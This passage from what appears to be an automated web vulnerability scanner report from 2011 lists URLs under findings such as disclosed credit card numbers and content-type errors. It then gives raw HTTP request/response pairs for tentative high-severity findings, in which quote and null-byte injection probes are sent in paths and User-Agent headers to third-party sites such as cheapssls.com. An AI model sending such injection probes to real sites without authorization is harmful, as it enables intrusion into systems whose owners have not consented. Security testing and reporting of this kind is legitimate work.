22.233. http://static.ak.facebook.com/connect/canvas_proxy.php
22.234. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/FGFbc80dUKj.png
22.235. http://www.facebook.com/connect/uiserver.php
22.236. http://www.facebook.com/extern/login_status.php
22.237. http://www.facebook.com/extern/login_status.php
22.238. http://www.facebook.com/extern/login_status.php
22.239. http://www.facebook.com/extern/login_status.php
22.240. http://www.facebook.com/extern/login_status.php
22.241. http://www.facebook.com/extern/login_status.php
22.242. http://www.facebook.com/plugins/like.php
22.243. http://www.facebook.com/plugins/like.php
22.244. http://www.facebook.com/plugins/like.php
22.245. http://www.facebook.com/plugins/like.php
22.246. http://www.facebook.com/plugins/like.php
22.247. http://www.facebook.com/plugins/like.php
22.248. http://www.facebook.com/plugins/like.php
22.249. http://www.facebook.com/plugins/like.php
22.250. http://www.facebook.com/plugins/like.php
22.251. http://www.facebook.com/plugins/like.php
22.252. http://www.facebook.com/plugins/like.php
22.253. http://www.facebook.com/plugins/like.php
22.254. http://www.facebook.com/plugins/like.php
22.255. http://www.facebook.com/plugins/like.php
22.256. http://www.register.com/
22.257. http://www.register.com/domain/searchresults.rcmx
22.258. http://www.register.com/unauthenticated_session_expired.rcmx
22.259. http://www.register.com/unauthenticated_session_expired.rcmx
23. Credit card numbers disclosed
23.1. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/bek_tr.pdf
23.2. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/dagstuhl-summary-09141.pdf
23.3. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/hotsec06.pdf
23.4. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/pepm08.pdf
23.5. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/transducers_tr.pdf
23.6. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/usenixsec11a.pdf
23.7. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/w2sp07.pdf
23.8. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/w2sp10.pdf
23.9. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pdf
23.10. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/usenixtech08.pdf
23.11. http://research.microsoft.com/en-us/um/people/livshits/papers/tr/scriptgard_tr.pdf
23.12. http://research.microsoft.com/en-us/um/people/nswamy/papers/beep-www07.pdf
23.13. http://research.microsoft.com/en-us/um/people/nswamy/papers/rs.pdf
23.14. http://research.microsoft.com/en-us/um/people/shuochen/papers/ScriptAccenting.pdf
23.15. http://research.microsoft.com/en-us/um/people/xiaohe/publication/IEEE_MMSP06_p226.pdf
23.16. http://research.microsoft.com/en-us/um/people/zhang/
23.18. http://www.meetup.com/Boston-BizSpark-Meetup/
24.1. http://825-wpk-761.mktoresp.com/webevents/visitWebPage
24.2. http://ads.bluelithium.com/pixel
24.3. http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js
24.4. http://apnxscm.ac3.msn.com:81/CACMSH.ashx
24.5. http://c.mouseflow.com/a.gif
24.6. http://c7.zedo.com/img/bh.gif
24.7. https://cart.godaddy.com/basket.aspx
24.8. http://cspix.media6degrees.com/orbserv/hbpix
24.9. http://d3.zedo.com/jsc/d3/bh.html
24.10. http://d7.zedo.com/img/bh.gif
24.11. http://dclk-match.dotomi.com/
24.12. http://fonts.googleapis.com/css
24.13. https://idp.godaddy.com/login.aspx
24.14. http://imagesak.securepaynet.net/assets/godaddy.ico
24.15. http://img.godaddy.com/image.aspx
24.16. http://img1.wsimg.com/assets/godaddy.ico
24.17. http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js
24.18. http://login.dotomi.com/ucm/UCMController
24.19. https://mya.godaddy.com/products/accountlist.aspx
24.20. http://pagead2.googlesyndication.com/pagead/imgad
24.21. http://pixel.adblade.com/imps.php
24.22. http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard
24.23. http://rss2search.com/delivery/ti.php
24.24. http://s.gravatar.com/js/gprofiles.js
24.25. http://segment-pixel.invitemedia.com/set_partner_uid
24.27. http://value.register.com/b/ss/registerwww-production/1/H.20.3/s74702994271647
24.28. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
24.29. https://www.cheapssls.com/index.php
24.30. http://www.digicert.com/
24.31. http://www.godaddy.com/SSL
24.32. https://www.godaddy.com/gdshop/xt_orderform_addmany.asp
24.33. http://www.googleadservices.com/pagead/conversion/1051291126/
24.34. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
24.36. https://www.microcad.ca/checkout/address
24.37. http://www.shrinktheweb.com/scripts/pagepix.js
24.38. https://www.sslmatrix.com/ssl-promotion-code
24.39. http://www.wunderground.com/dotset.php
24.40. http://www.youtube-nocookie.com/gen_204
25.1. https://careers.microsoft.com/Resumes.aspx
25.2. https://idp.godaddy.com/login.aspx
25.3. https://idp.godaddy.com/retrieveaccount.aspx
25.4. https://onlineaanvraag.diginotar.nl/Digiforms/FormDesigner.aspx
25.5. https://support.microsoft.com/contactus/emailcontact.aspx
25.6. https://www.diginotar.com/Branchsolutions/tabid/857/Default.aspx
25.7. https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx
25.8. https://www.microsoft-careers.com/
25.9. https://www.microsoft-careers.com/content/corporate-research/
25.10. https://www.microsoft-careers.com/find.job
25.11. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/
25.13. https://www.sslmatrix.com/Order/quickorder
25.14. https://www.sslmatrix.com/ssl-promotion-code
25.15. https://www.sslmatrix.com/ssl-promotion-code/ssl-price
26. HTML does not specify charset
26.1. http://d3.zedo.com/jsc/d3/bh.html
26.2. http://ds.addthis.com/red/psi/sites/vasco.com/p.json
26.3. http://mediacdn.disqus.com/1314991730/build/system/def.html
26.4. http://mediacdn.disqus.com/1314991730/build/system/reply.html
26.5. http://mediacdn.disqus.com/1314991730/build/system/upload.html
26.6. http://now.eloqua.com/visitor/v200/svrGP.aspx
26.7. https://onlineaanvraag.diginotar.nl/
26.8. http://research.microsoft.com/apps/dp/h.htm
26.9. http://research.microsoft.com/en-us/um/people/chengh/measure.html
26.10. http://research.microsoft.com/en-us/um/people/chengh/measurev2.html
26.11. http://research.microsoft.com/en-us/um/people/darkok/
26.12. http://research.microsoft.com/en-us/um/people/dbwilson/
26.13. http://research.microsoft.com/en-us/um/people/horvitz/
26.14. http://research.microsoft.com/en-us/um/people/lamport/
26.16. http://research.microsoft.com/en-us/um/people/ratul/
26.17. http://research.microsoft.com/en-us/um/people/schramm/memorial/
26.20. http://research.microsoft.com/en-us/um/people/ssaponas/
26.21. http://research.microsoft.com/en-us/um/people/yongrui/
26.24. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
26.25. http://www.godaddy.com/sso/keepalive.aspx
26.26. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php
26.27. https://www.sslmatrix.com/favicon.ico
27. Content type incorrectly stated
27.1. http://api.twitter.com/1/urls/resolve.json
27.2. http://api.twitter.com/1/users/search.json
27.3. http://api.twitter.com/i/search/image_facets.json
27.4. http://api.twitter.com/i/search/video_facets.json
27.5. http://diginotar.nl/Default.aspx
27.6. http://farm6.static.flickr.com/clientaccesspolicy.xml
27.7. http://farm6.static.flickr.com/crossdomain.xml
27.8. http://farm7.static.flickr.com/clientaccesspolicy.xml
27.9. http://feeds.feedburner.com/~s/meetup
27.10. http://img1.meetupstatic.com/39194172310009655/img/noPhoto_50.gif
27.11. http://img1.meetupstatic.com/photos/event/2/c/b/b/highres_36191451.jpeg
27.12. http://img1.meetupstatic.com/photos/event/6/e/b/highres_45241771.jpeg
27.13. http://img1.meetupstatic.com/photos/event/9/9/8/5/highres_32139301.jpeg
27.14. http://img2.meetupstatic.com/photos/event/9/c/2/3/highres_39819971.jpeg
27.15. http://img2.meetupstatic.com/photos/event/a/5/e/7/highres_43722471.jpeg
27.16. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png
27.17. http://microsoftcambridge.com/favicon.ico
27.18. http://microsoftcambridge.com/slideshow/Vertigo.small.xap
27.19. http://now.eloqua.com/visitor/v200/svrGP.aspx
27.20. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard
27.21. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Annuleren.png
27.22. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Volgende.png
27.23. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Vorige.png
27.24. http://photos1.meetupstatic.com/photos/event/2/8/a/0/thumb_22990400.jpeg
27.25. http://photos1.meetupstatic.com/photos/event/a/0/9/5/highres_9821109.jpeg
27.26. http://photos1.meetupstatic.com/photos/member/3/2/3/0/thumb_11052848.jpeg
27.27. http://photos2.meetupstatic.com/photos/event/9/1/d/e/thumb_10177342.jpeg
27.28. http://photos2.meetupstatic.com/photos/event/a/1/9/a/highres_9821370.jpeg
27.29. http://photos2.meetupstatic.com/photos/member/7/6/d/8/thumb_1590424.jpeg
27.30. http://photos2.meetupstatic.com/photos/member/a/e/2/9/thumb_9884585.jpeg
27.31. http://photos3.meetupstatic.com/photos/event/a/0/9/4/highres_9821108.jpeg
27.32. http://photos3.meetupstatic.com/photos/member/1/3/0/f/thumb_11344879.jpeg
27.33. http://photos3.meetupstatic.com/photos/member/1/d/6/1/thumb_18127521.jpeg
27.34. http://photos3.meetupstatic.com/photos/member/7/e/a/1/thumb_12752417.jpeg
27.35. http://photos4.meetupstatic.com/photos/event/a/0/9/6/highres_9821110.jpeg
27.36. http://photos4.meetupstatic.com/photos/member/2/7/2/f/thumb_20650031.jpeg
27.37. http://research.microsoft.com/en-us/um/people/helenw/papers/fullMashupOS.pptx
27.38. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pptx
27.39. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/w2sp10.pptx
27.40. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php
27.41. http://search.twitter.com/search.json
27.42. http://survey.112.2o7.net/survey/dynamic/suites/276/omniturecom-2011/list.js
27.43. http://twitter.com/account/available_features
27.44. http://vasco.com/app_pages/getDCP.aspx
27.45. http://www.godaddy.com/sso/keepalive.aspx
27.46. http://www.google.com/search
27.47. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php
27.48. http://www.meetup.com/api/
27.49. http://www.microcad.ca/livezilla/images/carrier_logo.gif
27.50. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc
27.51. http://www.microsoft-careers.com/model/remote/remotejobManager.cfc
27.52. http://www.omniture.com/listener.html
27.53. http://www.register.com/font/vag-bold.ttf
27.54. http://www.register.com/font/vag-bold.woff
28. Content type is not specified
28.1. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard
28.2. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard
29.1. https://cart.godaddy.com/
29.2. https://idp.godaddy.com/
29.3. https://mya.godaddy.com/
29.4. https://www.cheapssls.com/
29.5. https://www.godaddy.com/
29.6. https://www.microcad.ca/
29.7. https://www.sslmatrix.com/
Severity: | High |
Confidence: | Tentative |
Host: | http://cspix.media6d |
Path: | /orbserv/hbpix |
GET /orbserv/hbpix?pixId=1598 Host: cspix.media6degrees.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipinfo=2lqt1dm0zijas |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: orblb=2lqupib012fd10 Set-Cookie: vstcnt=41bb010r063d7 Set-Cookie: clid=2lqyje70117095f Set-Cookie: sglst=41bb00v00t044m Set-Cookie: rdrlst=41l0sh6lqyjef ...[SNIP]... |
GET /orbserv/hbpix?pixId=1598 Host: cspix.media6degrees.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipinfo=2lqt1dm0zijas |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: orblb=2lqupib012fd10 Set-Cookie: vstcnt=41bb010r064zb Set-Cookie: clid=2lqyje70117095f Set-Cookie: sglst=41bb00v00t044m Set-Cookie: rdrlst=41l0sh6lqyjef ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://ds.addthis.com |
Path: | /red/psi/sites/vasco.com |
GET /red/psi/sites/vasco.com Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.1 500 Internal Server Error Server: Apache-Coyote/1.1 Content-Length: 157 Content-Type: text/html Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:34 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:34 GMT; Path=/ Set-Cookie: di=%7B%7D..1315071154.10R P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sat, 03 Sep 2011 17:32:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 03 Sep 2011 17:32:34 GMT Connection: close Vary: Accept-Encoding <HTML> <HEAD> <TITLE>Error Page</TITLE> </HEAD> <BODY> An error (500 Internal Server Error) has occured in response to this request. </BODY> </HTML> |
GET /red/psi/sites/vasco.com Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.1 500 Internal Server Error Server: Apache-Coyote/1.1 Content-Length: 157 Content-Type: text/html Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:34 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:34 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sat, 03 Sep 2011 17:32:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 03 Sep 2011 17:32:34 GMT Connection: close Vary: Accept-Encoding <HTML> <HEAD> <TITLE>Error Page</TITLE> </HEAD> <BODY> An error (500 Internal Server Error) has occured in response to this request. </BODY> </HTML> |
Severity: | High |
Confidence: | Tentative |
Host: | http://t4.trackalyzer.com |
Path: | /trackalyze.asp |
GET /trackalyze.asp?r=None&p Host: t4.trackalyzer.com Proxy-Connection: keep-alive Referer: http://vasco.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: trackalyzer=28311708 |
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sat, 03 Sep 2011 17:33:13 GMT P3P: policyref="http:/ Content-Length: 270 Content-Type: text/html Set-Cookie: loop=http%3A%2F%2Fvasco Cache-control: private <font face="Arial" size=2> <p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font> <p> <font face="Arial" size=2>Type mismatch: 'cint'</font> <p> <font face="Arial" si ...[SNIP]... |
GET /trackalyze.asp?r=None&p Host: t4.trackalyzer.com Proxy-Connection: keep-alive Referer: http://vasco.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: trackalyzer=28311708 |
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sat, 03 Sep 2011 17:33:14 GMT P3P: policyref="http:/ Location: http://t4.trackalyzer.com Content-Length: 152 Content-Type: text/html Set-Cookie: loop=http%3A%2F%2Fvasco Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://t4 |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.cheapssls.com |
Path: | /index.php |
POST /index.php'?dispatch=statistics Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com Content-Length: 747 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:55:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: stat_uniq_code=134386+and X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:55:00 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php''?dispatch=statistics Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com Content-Length: 747 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:55:02 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:55:02 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.google.com Content-Length: 758 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:55:29 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=1c2uhdfvhbep Set-Cookie: stat_uniq_code=134386+and X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:55:28 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.google.com Content-Length: 758 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:55:30 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:55:30 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.google.com Content-Length: 747 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:54:18 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: stat_uniq_code=134386+and X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:54:17 GMT Content-Length: 1048 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': { '5b91fafac406f3f976c ...[SNIP]... |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.google.com Content-Length: 747 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:54:53 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:54:53 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com Content-Length: 758 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1%00' Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:55:05 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=ncc9kj9io45u Set-Cookie: stat_uniq_code=134386+and X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:55:04 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com Content-Length: 758 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1%00'' Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:55:07 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:55:08 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com Content-Length: 791 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1' Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:50:24 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=av3i5cjq840r Set-Cookie: stat_uniq_code=51f1b%250d X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:50:24 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com Content-Length: 791 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1'' Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:50:27 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:50:26 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.cheapssls.com |
Path: | /index.php |
